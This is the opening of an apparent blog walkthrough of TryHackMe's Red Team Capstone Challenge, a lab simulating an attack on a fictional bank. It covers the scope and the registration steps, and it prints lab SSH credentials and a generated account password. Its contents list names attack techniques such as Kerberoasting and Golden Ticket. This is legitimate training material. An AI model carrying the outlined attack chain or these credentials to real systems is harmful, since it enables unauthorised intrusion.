{"id":447,"date":"2024-02-18T21:42:54","date_gmt":"2024-02-19T03:42:54","guid":{"rendered":"https:\/\/blog.ishsome.com\/?p=447"},"modified":"2024-04-16T20:54:27","modified_gmt":"2024-04-17T01:54:27","slug":"tryhackme-red-team-capstone-challenge","status":"publish","type":"post","link":"https:\/\/blog.ishsome.com\/index.php\/2024\/02\/18\/tryhackme-red-team-capstone-challenge\/","title":{"rendered":"TryHackMe: Red Team Capstone Challenge"},"content":{"rendered":"\n<p>The <a href=\"https:\/\/tryhackme.com\/room\/redteamcapstonechallenge?\" target=\"_blank\" rel=\"noopener noreferrer nofollow\">Red Team Capstone challenge<\/a> from TryHackMe is an in-depth network challenge simulating a Red Teaming engagement. The challenge includes several phases structured around the cyber kill chain that will require you to enumerate a perimeter, breach the organization, perform lateral movement, and finally perform goal execution to show impact. To best simulate how these engagements usually occur, there is no single right answer. Instead, multiple paths can be used to achieve the final goal.<\/p>\n\n\n<div class=\"wp-block-ub-table-of-contents-block ub_table-of-contents\" id=\"ub_table-of-contents-46f1496b-97ce-4c36-9ae3-7f0904396cf2\" data-linktodivider=\"false\" data-showtext=\"show\" data-hidetext=\"hide\" data-scrolltype=\"auto\" data-enablesmoothscroll=\"false\" data-initiallyhideonmobile=\"false\" data-initiallyshow=\"true\"><div class=\"ub_table-of-contents-header-container\" style=\"background-color: #000000; color: #fcb900; \">\n\t\t\t<div class=\"ub_table-of-contents-header\" style=\"text-align: left; \">\n\t\t\t\t<div class=\"ub_table-of-contents-title\" style=\"color: #fcb900; \">Table of Contents<\/div>\n\t\t\t\t\n\t\t\t<\/div>\n\t\t<\/div><div class=\"ub_table-of-contents-extra-container\" style=\"background-color: #000000; \">\n\t\t\t<div class=\"ub_table-of-contents-container ub_table-of-contents-1-column \">\n\t\t\t\t<ul style=\"\"><li style=\"color: #ffffff; \"><a href=\"https:\/\/blog.ishsome.com\/index.php\/2024\/02\/18\/tryhackme-red-team-capstone-challenge\/#0-tested-learning-objectives-\" style=\"color: #fcb900; \">Tested Learning Objectives<\/a><ul><li style=\"color: #ffffff; \"><a href=\"https:\/\/blog.ishsome.com\/index.php\/2024\/02\/18\/tryhackme-red-team-capstone-challenge\/#1-project-overview-\" style=\"color: #fcb900; \">Project Overview<\/a><\/li><li style=\"color: #ffffff; \"><a href=\"https:\/\/blog.ishsome.com\/index.php\/2024\/02\/18\/tryhackme-red-team-capstone-challenge\/#2-project-goal-\" style=\"color: #fcb900; \">Project Goal<\/a><\/li><li style=\"color: #ffffff; \"><a href=\"https:\/\/blog.ishsome.com\/index.php\/2024\/02\/18\/tryhackme-red-team-capstone-challenge\/#3-project-scope-\" style=\"color: #fcb900; \">Project Scope<\/a><ul><li style=\"color: #ffffff; \"><a href=\"https:\/\/blog.ishsome.com\/index.php\/2024\/02\/18\/tryhackme-red-team-capstone-challenge\/#4-in-scope-\" style=\"color: #fcb900; \">In-Scope<\/a><\/li><li style=\"color: #ffffff; \"><a href=\"https:\/\/blog.ishsome.com\/index.php\/2024\/02\/18\/tryhackme-red-team-capstone-challenge\/#5-out-of-scope-\" style=\"color: #fcb900; \">Out-of-Scope<\/a><\/li><\/ul><\/li><li style=\"color: #ffffff; \"><a href=\"https:\/\/blog.ishsome.com\/index.php\/2024\/02\/18\/tryhackme-red-team-capstone-challenge\/#6-project-registration-\" style=\"color: #fcb900; \">Project Registration<\/a><\/li><li style=\"color: #ffffff; \"><a href=\"https:\/\/blog.ishsome.com\/index.php\/2024\/02\/18\/tryhackme-red-team-capstone-challenge\/#7-submitting-the-flags-\" style=\"color: #fcb900; \">Submitting the Flags<\/a><\/li><\/ul><\/li><li style=\"color: #ffffff; \"><a href=\"https:\/\/blog.ishsome.com\/index.php\/2024\/02\/18\/tryhackme-red-team-capstone-challenge\/#8-exploiting-the-external-network-\" style=\"color: #fcb900; \">Exploiting the External Network<\/a><ul><li style=\"color: #ffffff; \"><a href=\"https:\/\/blog.ishsome.com\/index.php\/2024\/02\/18\/tryhackme-red-team-capstone-challenge\/#9-osint-on-web-machine-\" style=\"color: #fcb900; \">OSINT on WEB Machine<\/a><ul><li style=\"color: #ffffff; \"><a href=\"https:\/\/blog.ishsome.com\/index.php\/2024\/02\/18\/tryhackme-red-team-capstone-challenge\/#10-nmap-\" style=\"color: #fcb900; \">NMAP<\/a><\/li><li style=\"color: #ffffff; \"><a href=\"https:\/\/blog.ishsome.com\/index.php\/2024\/02\/18\/tryhackme-red-team-capstone-challenge\/#11-http-\" style=\"color: #fcb900; \">HTTP<\/a><\/li><\/ul><\/li><li style=\"color: #ffffff; \"><a href=\"https:\/\/blog.ishsome.com\/index.php\/2024\/02\/18\/tryhackme-red-team-capstone-challenge\/#12-mail-machine-\" style=\"color: #fcb900; \">Mail Machine<\/a><ul><li style=\"color: #ffffff; \"><a href=\"https:\/\/blog.ishsome.com\/index.php\/2024\/02\/18\/tryhackme-red-team-capstone-challenge\/#13-http-\" style=\"color: #fcb900; \">HTTP<\/a><ul><li style=\"color: #ffffff; \"><a href=\"https:\/\/blog.ishsome.com\/index.php\/2024\/02\/18\/tryhackme-red-team-capstone-challenge\/#14-gobuster-\" style=\"color: #fcb900; \">GoBuster<\/a><\/li><li style=\"color: #ffffff; \"><a href=\"https:\/\/blog.ishsome.com\/index.php\/2024\/02\/18\/tryhackme-red-team-capstone-challenge\/#15-roundcube-webmail-\" style=\"color: #fcb900; \">RoundCube Webmail<\/a><\/li><\/ul><\/li><li style=\"color: #ffffff; \"><a href=\"https:\/\/blog.ishsome.com\/index.php\/2024\/02\/18\/tryhackme-red-team-capstone-challenge\/#16-smtp-brute-force-\" style=\"color: #fcb900; \">SMTP Brute-Force<\/a><\/li><\/ul><\/li><li style=\"color: #ffffff; \"><a href=\"https:\/\/blog.ishsome.com\/index.php\/2024\/02\/18\/tryhackme-red-team-capstone-challenge\/#17-vpn-machine-\" style=\"color: #fcb900; \">VPN Machine<\/a><ul><li style=\"color: #ffffff; \"><a href=\"https:\/\/blog.ishsome.com\/index.php\/2024\/02\/18\/tryhackme-red-team-capstone-challenge\/#18-nmap-\" style=\"color: #fcb900; \">NMAP<\/a><\/li><li style=\"color: #ffffff; \"><a href=\"https:\/\/blog.ishsome.com\/index.php\/2024\/02\/18\/tryhackme-red-team-capstone-challenge\/#19-http-\" style=\"color: #fcb900; \">HTTP<\/a><ul><li style=\"color: #ffffff; \"><a href=\"https:\/\/blog.ishsome.com\/index.php\/2024\/02\/18\/tryhackme-red-team-capstone-challenge\/#20-gobuster-\" style=\"color: #fcb900; \">GoBuster<\/a><\/li><\/ul><\/li><li style=\"color: #ffffff; \"><a href=\"https:\/\/blog.ishsome.com\/index.php\/2024\/02\/18\/tryhackme-red-team-capstone-challenge\/#21-foothold-on-vpn-machine-\" style=\"color: #fcb900; \">Foothold on VPN Machine<\/a><\/li><li style=\"color: #ffffff; \"><a href=\"https:\/\/blog.ishsome.com\/index.php\/2024\/02\/18\/tryhackme-red-team-capstone-challenge\/#22-connecting-to-mysql-\" style=\"color: #fcb900; \">Connecting to MySQL<\/a><\/li><li style=\"color: #ffffff; \"><a href=\"https:\/\/blog.ishsome.com\/index.php\/2024\/02\/18\/tryhackme-red-team-capstone-challenge\/#23-privilege-escalation-\" style=\"color: #fcb900; \">Privilege Escalation<\/a><ul><li style=\"color: #ffffff; \"><a href=\"https:\/\/blog.ishsome.com\/index.php\/2024\/02\/18\/tryhackme-red-team-capstone-challenge\/#24-ping-sweep-\" style=\"color: #fcb900; \">Ping Sweep<\/a><\/li><\/ul><\/li><li style=\"color: #ffffff; \"><a href=\"https:\/\/blog.ishsome.com\/index.php\/2024\/02\/18\/tryhackme-red-team-capstone-challenge\/#25-pivoting-setup-\" style=\"color: #fcb900; \">Pivoting Setup<\/a><\/li><\/ul><\/li><\/ul><\/li><li style=\"color: #ffffff; \"><a href=\"https:\/\/blog.ishsome.com\/index.php\/2024\/02\/18\/tryhackme-red-team-capstone-challenge\/#26-breaching-the-perimeter-\" style=\"color: #fcb900; \">Breaching the Perimeter<\/a><ul><li style=\"color: #ffffff; \"><a href=\"https:\/\/blog.ishsome.com\/index.php\/2024\/02\/18\/tryhackme-red-team-capstone-challenge\/#27-wrk1-machine-\" style=\"color: #fcb900; \">WRK1 Machine<\/a><ul><li style=\"color: #ffffff; \"><a href=\"https:\/\/blog.ishsome.com\/index.php\/2024\/02\/18\/tryhackme-red-team-capstone-challenge\/#28-nmap-\" style=\"color: #fcb900; \">NMAP<\/a><\/li><\/ul><\/li><li style=\"color: #ffffff; \"><a href=\"https:\/\/blog.ishsome.com\/index.php\/2024\/02\/18\/tryhackme-red-team-capstone-challenge\/#29-kerberoasting-\" style=\"color: #fcb900; \">Kerberoasting<\/a><\/li><\/ul><\/li><li style=\"color: #ffffff; \"><a href=\"https:\/\/blog.ishsome.com\/index.php\/2024\/02\/18\/tryhackme-red-team-capstone-challenge\/#30-compromising-the-corpdc-\" style=\"color: #fcb900; \">Compromising the CORPDC<\/a><\/li><li style=\"color: #ffffff; \"><a href=\"https:\/\/blog.ishsome.com\/index.php\/2024\/02\/18\/tryhackme-red-team-capstone-challenge\/#31-compromising-the-rootdc-\" style=\"color: #fcb900; \">Compromising the ROOTDC<\/a><ul><li style=\"color: #ffffff; \"><a href=\"https:\/\/blog.ishsome.com\/index.php\/2024\/02\/18\/tryhackme-red-team-capstone-challenge\/#32-golden-ticket-attack-\" style=\"color: #fcb900; \">Golden Ticket Attack<\/a><\/li><\/ul><\/li><li style=\"color: #ffffff; \"><a href=\"https:\/\/blog.ishsome.com\/index.php\/2024\/02\/18\/tryhackme-red-team-capstone-challenge\/#33-compromising-bankdc-\" style=\"color: #fcb900; \">Compromising BANKDC<\/a><\/li><li style=\"color: #ffffff; \"><a href=\"https:\/\/blog.ishsome.com\/index.php\/2024\/02\/18\/tryhackme-red-team-capstone-challenge\/#34-compromising-swift-banking-system-\" style=\"color: #fcb900; \">Compromising SWIFT Banking System<\/a><\/li><li style=\"color: #ffffff; \"><a href=\"https:\/\/blog.ishsome.com\/index.php\/2024\/02\/18\/tryhackme-red-team-capstone-challenge\/#35-conclusion-\" style=\"color: #fcb900; \">Conclusion<\/a><\/li><\/ul>\n\t\t\t<\/div>\n\t\t<\/div><\/div>\n\n\n<div style=\"height:10px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<h2 class=\"wp-block-heading\" id=\"0-tested-learning-objectives-\"><mark style=\"background-color:rgba(0, 0, 0, 0)\" class=\"has-inline-color has-luminous-vivid-amber-color\">Tested Learning Objectives<\/mark><\/h2>\n\n\n\n<p>To solve this challenge successfully, the below-listed skills are pre-requisite. <\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li><a>OSINT<\/a>&nbsp;(Simulated)<\/li>\n\n\n\n<li>Enumeration &amp; Fuzzing<\/li>\n\n\n\n<li><a>Phishing<\/a><\/li>\n\n\n\n<li><a>AV<\/a>&nbsp;Evasion<\/li>\n\n\n\n<li>Lateral Movement<\/li>\n\n\n\n<li><a>AD<\/a>&nbsp;Exploitation<\/li>\n\n\n\n<li><a>Linux<\/a>&nbsp;and Windows Security Testing<\/li>\n\n\n\n<li>Privilege Escalation<\/li>\n\n\n\n<li>Post-Compromise Exploitation<\/li>\n<\/ul>\n\n\n\n<div style=\"height:13px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<h3 class=\"wp-block-heading\" id=\"1-project-overview-\"><mark style=\"background-color:rgba(0, 0, 0, 0)\" class=\"has-inline-color has-luminous-vivid-amber-color\">Project Overview<\/mark><\/h3>\n\n\n\n<p>TryHackMe, a cybersecurity consultancy firm, has been approached by the government of Trimento to perform a red team engagement against their Reserve Bank (TheReserve).&nbsp;<\/p>\n\n\n\n<p>Trimento is an island country situated in the Pacific. While they may be small in size, they are by no means not wealthy due to foreign investment. Their reserve bank has two main divisions:<\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li><strong>Corporate<\/strong>&nbsp;&#8211; The reserve bank of Trimento allows foreign investments, so they have a department that takes care of the country&#8217;s corporate banking clients.<\/li>\n\n\n\n<li><strong>Bank<\/strong>&nbsp;&#8211; The reserve bank of Trimento is in charge of the core banking system in the country, which connects to other banks around the world.<\/li>\n<\/ul>\n\n\n\n<p>The Trimento government has stated that the assessment will cover the entire reserve bank, including both its perimeter and internal networks. They are concerned that the corporate division while boosting the economy, may be endangering the core banking system due to insufficient segregation. The outcome of this red team engagement will determine whether the corporate division should be spun off into its own company.<\/p>\n\n\n\n<div style=\"height:14px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<h3 class=\"wp-block-heading\" id=\"2-project-goal-\"><mark style=\"background-color:rgba(0, 0, 0, 0)\" class=\"has-inline-color has-luminous-vivid-amber-color\">Project Goal<\/mark><\/h3>\n\n\n\n<p>The purpose of this assessment is to evaluate whether the corporate division can be compromised and, if so, determine if it could compromise the bank division. A simulated fraudulent money transfer must be performed to fully demonstrate the compromise.<\/p>\n\n\n\n<p>To do this safely, TheReserve will create two new core banking accounts for you. You will need to demonstrate that it&#8217;s possible to transfer funds between these two accounts. The only way this is possible is by gaining access to SWIFT, the core backend banking system.<\/p>\n\n\n\n<p><em><strong>Note:<\/strong>&nbsp;SWIFT<\/em>&nbsp;(Society for Worldwide Interbank Financial Telecommunications)&nbsp;<em>is the actual system that is used by banks for backend transfers. In this assessment, a core backend system has been created. However, for security reasons, intentional inaccuracies have been introduced into this process. If you wish to learn more about actual SWIFT and its security, feel free to go do some research! To put it in other words, the information that follows here has been&nbsp;<strong>made up<\/strong>.<\/em><\/p>\n\n\n\n<p>To help you understand the project goal, the government of Trimento has shared some information about the SWIFT backend system. SWIFT runs in an isolated secure environment with restricted access. While the word impossible should not be used lightly, the likelihood of the compromise of the actual hosting infrastructure is so slim that it is fair to say that it is impossible to compromise this infrastructure.<\/p>\n\n\n\n<p>However, the SWIFT backend exposes an internal web application at&nbsp;<a href=\"http:\/\/swift.bank.thereserve.loc\/,\" target=\"_blank\" rel=\"noreferrer noopener\">http:\/\/swift.bank.thereserve.loc\/,<\/a>&nbsp;which TheReserve uses to facilitate transfers. The government has provided a general process for transfers. To transfer funds:<\/p>\n\n\n\n<ol class=\"wp-block-list\">\n<li>A customer makes a request that funds should be transferred and receives a transfer code.<\/li>\n\n\n\n<li>The customer contacts the bank and provides this transfer code.<\/li>\n\n\n\n<li>An employee with the capturer role authenticates to the SWIFT application and&nbsp;<em>captures<\/em>&nbsp;the transfer.<\/li>\n\n\n\n<li>An employee with the approver role reviews the transfer details and, if verified,&nbsp;<em>approves<\/em>&nbsp;the transfer. This has to be performed from a jump host.<\/li>\n\n\n\n<li>Once approval for the transfer is received by the SWIFT network, the transfer is facilitated and the customer is notified.<\/li>\n<\/ol>\n\n\n\n<p>Separation of duties is performed to ensure that no single employee can both capture and approve the same transfer.<\/p>\n\n\n\n<div style=\"height:12px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<h3 class=\"wp-block-heading\" id=\"3-project-scope-\"><mark style=\"background-color:rgba(0, 0, 0, 0)\" class=\"has-inline-color has-luminous-vivid-amber-color\">Project Scope<\/mark><\/h3>\n\n\n\n<p>This section details the project scope.<\/p>\n\n\n\n<h4 class=\"wp-block-heading\" id=\"4-in-scope-\"><mark style=\"background-color:rgba(0, 0, 0, 0)\" class=\"has-inline-color has-luminous-vivid-amber-color\">In-Scope<\/mark><\/h4>\n\n\n\n<ul class=\"wp-block-list\">\n<li>Security testing of TheReserve&#8217;s internal and external networks, including all IP ranges accessible through your VPN connection.<\/li>\n\n\n\n<li>OSINTing of TheReserve&#8217;s corporate website, which is exposed on the external network of TheReserve. Note, that this means that all OSINT activities should be limited to the provided network subnet, and no external internet OSINTing is required.<\/li>\n\n\n\n<li>Phishing of any of the employees of TheReserve.<\/li>\n\n\n\n<li>Attacking the mailboxes of TheReserve employees on the WebMail host (.11).<\/li>\n\n\n\n<li>Using any attack methods to complete the goal of performing the transaction between the provided accounts.<\/li>\n<\/ul>\n\n\n\n<h4 class=\"wp-block-heading\" id=\"5-out-of-scope-\"><mark style=\"background-color:rgba(0, 0, 0, 0)\" class=\"has-inline-color has-luminous-vivid-amber-color\">Out-of-Scope<\/mark><\/h4>\n\n\n\n<ul class=\"wp-block-list\">\n<li>Security testing of any sites not hosted on the network.<\/li>\n\n\n\n<li>Security testing of the TryHackMe VPN (.250) and scoring servers, or attempts to attack any other user connected to the network.<\/li>\n\n\n\n<li>Any security testing on the WebMail server (.11) that alters the mail server configuration or its underlying infrastructure.<\/li>\n\n\n\n<li>Attacking the mailboxes of other red teamers on the WebMail portal (.11).<\/li>\n\n\n\n<li>External (internet) OSINT gathering.<\/li>\n\n\n\n<li>Attacking any hosts outside of the provided subnet range. Once you have completed the questions below, your subnet will be displayed in the network diagram. This 10.200.X.0\/24 network is the only in-scope network for this challenge.<\/li>\n\n\n\n<li>Conducting DoS attacks or any attack that renders the network inoperable for other users.<\/li>\n<\/ul>\n\n\n\n<div style=\"height:11px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<h3 class=\"wp-block-heading\" id=\"6-project-registration-\"><mark style=\"background-color:rgba(0, 0, 0, 0)\" class=\"has-inline-color has-luminous-vivid-amber-color\">Project Registration<\/mark><\/h3>\n\n\n\n<p>The Trimento government mandates that all red teamers from TryHackMe participating in the challenge must register to allow their single point of contact for the engagement to track activities. As the island&#8217;s network is segregated, this will also provide the testers access to an email account for communication with the government and an approved phishing email address, should phishing be performed.<\/p>\n\n\n\n<p>To register, you need to get in touch with the government through its e-Citizen communication portal that uses SSH for communication. Here are the SSH details provided:<\/p>\n\n\n\n<figure class=\"wp-block-table\"><table><tbody><tr><td><strong>SSH Username<\/strong><\/td><td>e-citizen<\/td><\/tr><tr><td><strong>SSH Password<\/strong><\/td><td>stabilitythroughcurrency<\/td><\/tr><tr><td><strong>SSH IP<\/strong><\/td><td>X.X.X.250<\/td><\/tr><\/tbody><\/table><\/figure>\n\n\n\n<p>Once you complete the questions below, the network diagram at the start of the room will show the IP specific to your network. Use that information to replace the X values in your SSH IP.<\/p>\n\n\n\n<p>Once you authenticate, you will be able to communicate with the e-Citizen system. Follow the prompts to register for the challenge, and save the information you get for future reference. Once registered, follow the instructions to verify that you have access to all the relevant systems.<\/p>\n\n\n\n<div style=\"height:11px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<div class=\"wp-block-kevinbatdorf-code-block-pro\" data-code-block-pro-font-family=\"Code-Pro-JetBrains-Mono\" style=\"font-size:.875rem;font-family:Code-Pro-JetBrains-Mono,ui-monospace,SFMono-Regular,Menlo,Monaco,Consolas,monospace;line-height:1.25rem;--cbp-tab-width:2;tab-size:var(--cbp-tab-width, 2)\"><span style=\"display:block;padding:16px 0 0 16px;margin-bottom:-1px;width:100%;text-align:left;background-color:#0F111A\"><svg xmlns=\"http:\/\/www.w3.org\/2000\/svg\" width=\"54\" height=\"14\" viewBox=\"0 0 54 14\"><g fill=\"none\" fill-rule=\"evenodd\" transform=\"translate(1 1)\"><circle cx=\"6\" cy=\"6\" r=\"6\" fill=\"#FF5F56\" stroke=\"#E0443E\" stroke-width=\".5\"><\/circle><circle cx=\"26\" cy=\"6\" r=\"6\" fill=\"#FFBD2E\" stroke=\"#DEA123\" stroke-width=\".5\"><\/circle><circle cx=\"46\" cy=\"6\" r=\"6\" fill=\"#27C93F\" stroke=\"#1AAB29\" stroke-width=\".5\"><\/circle><\/g><\/svg><\/span><span role=\"button\" tabindex=\"0\" data-code=\"\u250c\u2500\u2500(ishsome\u327fkali)-[~\/THM\/RedTeam-Capstone]\n\u2514\u2500$ ssh e-citizen@10.200.113.250\ne-citizen@10.200.113.250's password: \n\nWelcome to the e-Citizen platform!\nPlease make a selection:\n[1] Register\n[2] Authenticate\n[3] Exit\nSelection:1\n\nPlease provide your THM username: ishsome36\nCreating email user\nUser has been succesfully created\n\n\n=======================================\nThank you for registering on e-Citizen for the Red Team engagement against TheReserve.\nPlease take note of the following details and please make sure to save them, as they will not be displayed again.\n=======================================\nUsername: ishsome36\nPassword: tZ1Zl-HpHts8F82Y\nMailAddr: ishsome36@corp.th3reserve.loc\nIP Range: 10.200.113.0\/24\n=======================================\" style=\"color:#babed8;display:none\" aria-label=\"Copy\" class=\"code-block-pro-copy-button\"><svg xmlns=\"http:\/\/www.w3.org\/2000\/svg\" style=\"width:24px;height:24px\" fill=\"none\" viewBox=\"0 0 24 24\" stroke=\"currentColor\" stroke-width=\"2\"><path class=\"with-check\" stroke-linecap=\"round\" stroke-linejoin=\"round\" d=\"M9 5H7a2 2 0 00-2 2v12a2 2 0 002 2h10a2 2 0 002-2V7a2 2 0 00-2-2h-2M9 5a2 2 0 002 2h2a2 2 0 002-2M9 5a2 2 0 012-2h2a2 2 0 012 2m-6 9l2 2 4-4\"><\/path><path class=\"without-check\" stroke-linecap=\"round\" stroke-linejoin=\"round\" d=\"M9 5H7a2 2 0 00-2 2v12a2 2 0 002 2h10a2 2 0 002-2V7a2 2 0 00-2-2h-2M9 5a2 2 0 002 2h2a2 2 0 002-2M9 5a2 2 0 012-2h2a2 2 0 012 2\"><\/path><\/svg><\/span><pre class=\"shiki material-theme-ocean\" style=\"background-color: #0F111A\" tabindex=\"0\"><code><span class=\"line\"><span style=\"color: #FFCB6B\">\u250c\u2500\u2500(ishsome\u327fkali<\/span><span style=\"color: #BABED8\">)-<\/span><span style=\"color: #89DDFF\">[<\/span><span style=\"color: #BABED8\">~\/THM\/RedTeam-Capstone<\/span><span style=\"color: #89DDFF\">]<\/span><\/span>\n<span class=\"line\"><span style=\"color: #FFCB6B\">\u2514\u2500$<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">ssh<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">e-citizen@10.200.113.250<\/span><\/span>\n<span class=\"line\"><span style=\"color: #FFCB6B\">e-citizen@10.200.113.250<\/span><span style=\"color: #FFCB6B\">&#39;s password: <\/span><\/span>\n<span class=\"line\"><\/span>\n<span class=\"line\"><span style=\"color: #FFCB6B\">Welcome to the e-Citizen platform!<\/span><\/span>\n<span class=\"line\"><span style=\"color: #FFCB6B\">Please make a selection:<\/span><\/span>\n<span class=\"line\"><span style=\"color: #FFCB6B\">[1] Register<\/span><\/span>\n<span class=\"line\"><span style=\"color: #FFCB6B\">[2] Authenticate<\/span><\/span>\n<span class=\"line\"><span style=\"color: #FFCB6B\">[3] Exit<\/span><\/span>\n<span class=\"line\"><span style=\"color: #FFCB6B\">Selection:1<\/span><\/span>\n<span class=\"line\"><\/span>\n<span class=\"line\"><span style=\"color: #FFCB6B\">Please provide your THM username: ishsome36<\/span><\/span>\n<span class=\"line\"><span style=\"color: #FFCB6B\">Creating email user<\/span><\/span>\n<span class=\"line\"><span style=\"color: #FFCB6B\">User has been succesfully created<\/span><\/span>\n<span class=\"line\"><\/span>\n<span class=\"line\"><\/span>\n<span class=\"line\"><span style=\"color: #FFCB6B\">=======================================<\/span><\/span>\n<span class=\"line\"><span style=\"color: #FFCB6B\">Thank you for registering on e-Citizen for the Red Team engagement against TheReserve.<\/span><\/span>\n<span class=\"line\"><span style=\"color: #FFCB6B\">Please take note of the following details and please make sure to save them, as they will not be displayed again.<\/span><\/span>\n<span class=\"line\"><span style=\"color: #FFCB6B\">=======================================<\/span><\/span>\n<span class=\"line\"><span style=\"color: #FFCB6B\">Username: ishsome36<\/span><\/span>\n<span class=\"line\"><span style=\"color: #FFCB6B\">Password: tZ1Zl-HpHts8F82Y<\/span><\/span>\n<span class=\"line\"><span style=\"color: #FFCB6B\">MailAddr: ishsome36@corp.th3reserve.loc<\/span><\/span>\n<span class=\"line\"><span style=\"color: #FFCB6B\">IP Range: 10.200.113.0\/24<\/span><\/span>\n<span class=\"line\"><span style=\"color: #FFCB6B\">=======================================<\/span><\/span><\/code><\/pre><\/div>\n\n\n\n<div style=\"height:10px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<p>The VPN server and the e-Citizen platform are not in scope for this assessment, and any security testing of these systems may lead to a ban from the challenge.<\/p>\n\n\n\n<p>As you make your way through the network, you will need to prove your compromises. To do that, you will be requested to perform specific steps on the host that you have compromised. Please note the hostnames in the network diagram above, as you will need this information. Flags can only be accessed from matching hosts, so even if you have higher access, you will need to lower your access to the specific host required to submit the flag.<\/p>\n\n\n\n<h3 class=\"wp-block-heading\" id=\"7-submitting-the-flags-\"><mark style=\"background-color:rgba(0, 0, 0, 0)\" class=\"has-inline-color has-luminous-vivid-amber-color\">Submitting the Flags<\/mark><\/h3>\n\n\n\n<p>To submit the proof of compromise, connect to the <code>e-citizen<\/code> platform via SSH and select option 2 to authenticate. Use the credentials provided during the registration to authenticate. After successfully authenticating, you will see more options.<\/p>\n\n\n\n<div style=\"height:14px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<figure data-wp-context=\"{&quot;imageId&quot;:&quot;6a03b090f2f8c&quot;}\" data-wp-interactive=\"core\/image\" data-wp-key=\"6a03b090f2f8c\" class=\"wp-block-image size-full wp-lightbox-container\"><img data-recalc-dims=\"1\" loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"862\" data-attachment-id=\"568\" data-permalink=\"https:\/\/blog.ishsome.com\/index.php\/2024\/02\/18\/tryhackme-red-team-capstone-challenge\/e-citizen\/\" data-orig-file=\"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/e-citizen.png?fit=1024%2C862&amp;ssl=1\" data-orig-size=\"1024,862\" data-comments-opened=\"1\" data-image-meta=\"{&quot;aperture&quot;:&quot;0&quot;,&quot;credit&quot;:&quot;&quot;,&quot;camera&quot;:&quot;&quot;,&quot;caption&quot;:&quot;&quot;,&quot;created_timestamp&quot;:&quot;0&quot;,&quot;copyright&quot;:&quot;&quot;,&quot;focal_length&quot;:&quot;0&quot;,&quot;iso&quot;:&quot;0&quot;,&quot;shutter_speed&quot;:&quot;0&quot;,&quot;title&quot;:&quot;&quot;,&quot;orientation&quot;:&quot;0&quot;}\" data-image-title=\"e-citizen\" data-image-description=\"\" data-image-caption=\"\" data-large-file=\"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/e-citizen.png?fit=1024%2C862&amp;ssl=1\" data-wp-class--hide=\"state.isContentHidden\" data-wp-class--show=\"state.isContentVisible\" data-wp-init=\"callbacks.setButtonStyles\" data-wp-on--click=\"actions.showLightbox\" data-wp-on--load=\"callbacks.setButtonStyles\" data-wp-on-window--resize=\"callbacks.setButtonStyles\" src=\"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/e-citizen.png?resize=1024%2C862&#038;ssl=1\" alt=\"\" class=\"wp-image-568\" srcset=\"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/e-citizen.png?w=1024&amp;ssl=1 1024w, https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/e-citizen.png?resize=300%2C253&amp;ssl=1 300w, https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/e-citizen.png?resize=768%2C647&amp;ssl=1 768w\" sizes=\"auto, (max-width: 1000px) 100vw, 1000px\" \/><button\n\t\t\tclass=\"lightbox-trigger\"\n\t\t\ttype=\"button\"\n\t\t\taria-haspopup=\"dialog\"\n\t\t\taria-label=\"Enlarge\"\n\t\t\tdata-wp-init=\"callbacks.initTriggerButton\"\n\t\t\tdata-wp-on--click=\"actions.showLightbox\"\n\t\t\tdata-wp-style--right=\"state.imageButtonRight\"\n\t\t\tdata-wp-style--top=\"state.imageButtonTop\"\n\t\t>\n\t\t\t<svg xmlns=\"http:\/\/www.w3.org\/2000\/svg\" width=\"12\" height=\"12\" fill=\"none\" viewBox=\"0 0 12 12\">\n\t\t\t\t<path fill=\"#fff\" d=\"M2 0a2 2 0 0 0-2 2v2h1.5V2a.5.5 0 0 1 .5-.5h2V0H2Zm2 10.5H2a.5.5 0 0 1-.5-.5V8H0v2a2 2 0 0 0 2 2h2v-1.5ZM8 12v-1.5h2a.5.5 0 0 0 .5-.5V8H12v2a2 2 0 0 1-2 2H8Zm2-12a2 2 0 0 1 2 2v2h-1.5V2a.5.5 0 0 0-.5-.5H8V0h2Z\" \/>\n\t\t\t<\/svg>\n\t\t<\/button><\/figure>\n\n\n\n<div style=\"height:13px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<p>We need to select the option that suits us best based on the hosts we compromised. For example, if we select the option [1] here, it will ask for the hostname we compromised. The further instructions will tell us how to submit the proof of compromise. Once the proof is submitted, we will get the flag value in our email.<\/p>\n\n\n\n<div style=\"height:11px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<figure class=\"wp-block-image size-large\"><img data-recalc-dims=\"1\" loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"297\" data-attachment-id=\"493\" data-permalink=\"https:\/\/blog.ishsome.com\/index.php\/2024\/02\/18\/tryhackme-red-team-capstone-challenge\/pasted-image-20240206141907\/\" data-orig-file=\"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240206141907.png?fit=1933%2C561&amp;ssl=1\" data-orig-size=\"1933,561\" data-comments-opened=\"1\" 